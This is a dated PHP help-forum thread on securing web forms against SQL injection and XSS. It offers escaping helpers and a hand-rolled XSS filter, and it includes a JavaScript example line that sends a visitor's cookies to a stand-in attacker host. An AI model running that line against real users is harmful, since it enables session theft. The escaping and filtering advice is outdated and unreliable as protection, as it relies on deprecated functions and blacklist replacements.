Jump to content

Security PHP & Forms


Mutley

Recommended Posts

Is there any tips you can give about securing PHP and forms? I think with forms it is possible at times to do SQL injections, how can you prevent this and stop abuse with forms?

Maybe restrict characters used, I would like to know how to secure the scripts I create.
Link to comment
Share on other sites

I just looked up mysql_real_escape_string in the PHP manual, so I can just use it among my variables within form fields. Looks easy and useful, I guess it disables certain characters or character combinations to be used.

Not heard of XSS, is it common?
Link to comment
Share on other sites

[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
I just looked up mysql_real_escape_string in the PHP manual, so I can just use it among my variables within form fields. Looks easy and useful, I guess it disables certain characters or character combinations to be used.[/quote]


More or less yes :)
But you need to make sure that magic_quotes is turned off, because then the string will be escaped twice. And because mysql_real_escape_string() has a better effect compared to magic_quotes, it's important to use strip_slashes() before escaping (if magic_quotes is on).
I use this function to escape my strings:

[code]<?php

function sql_quote($value)
{

if(get_magic_quotes_gpc())
   $value = stripslashes($value);

if(function_exists("mysql_real_escape_string"))
   $value = mysql_real_escape_string($value);
else
   $value = addslashes($value);

return $value;
}

?>[/code]

Orio.
Link to comment
Share on other sites

[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
Not heard of XSS, is it common?
[/quote]

Yeah, It's beginning to get quite common, it works like this:
1. User gets redirected to hackers page. Could be like this (javascript): [code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code]
2. The page harvests the cookie information
3. The user is redirected back the original page.

Here are some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia.org/wiki/Cross_site_scripting
Link to comment
Share on other sites

[quote author=pedrobcabral link=topic=110976.msg449433#msg449433 date=1160419559]
Is that also prevented with the command spoken above?
[/quote]

No. For that you would have to do something like this: [code]$t = html_entity_decode($t,ENT_QUOTES);
$t = str_replace("<","&#60;",$t);
$t = str_replace(">","&#62;",$t);
$t = str_replace("&quot;",htmlspecialchars('"'),$t);
$t = preg_replace("/&#0*([0-9]*);?/",'&#\\1;',$t);
$t = str_replace('&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;','javascript:',$t);
$t = preg_replace("/javascript:/i","nojava"/*&#97;v&#97;*/."script:",$t);
$t = preg_replace("/vbscript:/i","novb"/*&#98;*/."script:",$t);[/code]

More info on XSS prevention: http://blog.bitflux.ch/wiki/XSS_Prevention
Link to comment
Share on other sites

[quote author=Daniel0 link=topic=110976.msg449426#msg449426 date=1160418859]
[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
Not heard of XSS, is it common?
[/quote]

Yeah, It's beginning to get quite common, it works like this:
1. User gets redirected to hackers page. Could be like this (javascript): [code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code]
2. The page harvests the cookie information
3. The user is redirected back the original page.

Here are some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia.org/wiki/Cross_site_scripting
[/quote]

Very nice Daniel0..

Here is a atricle from Developer Fusion on [url=http://www.developerfusion.co.uk/show/4656/]sql insertion[/url].

Good luck,
Tom
Link to comment
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.